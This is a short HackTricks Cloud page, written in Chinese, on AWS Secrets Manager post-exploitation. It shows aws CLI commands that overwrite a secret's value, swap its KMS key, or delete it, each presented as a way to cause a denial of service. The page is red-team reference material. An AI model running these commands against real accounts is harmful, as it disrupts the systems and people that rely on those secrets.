AWS - Secrets Manager Post Exploitation

学习和实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 @hacktricks_live** 上关注我们。**
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 分享黑客技巧。

Secrets Manager

有关更多信息，请查看：

AWS - Secrets Manager Enum

读取秘密

秘密本身是敏感信息，查看权限提升页面以了解如何读取它们。

DoS 更改秘密值

更改秘密的值可能会导致DoS 所有依赖于该值的系统。

请注意，之前的值也会被存储，因此很容易回到之前的值。

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS 更改 KMS 密钥

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS 删除秘密

删除秘密的最小天数为 7 天

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

PreviousAWS - S3 Post Exploitation NextAWS - SES Post Exploitation

Last updated 1 month ago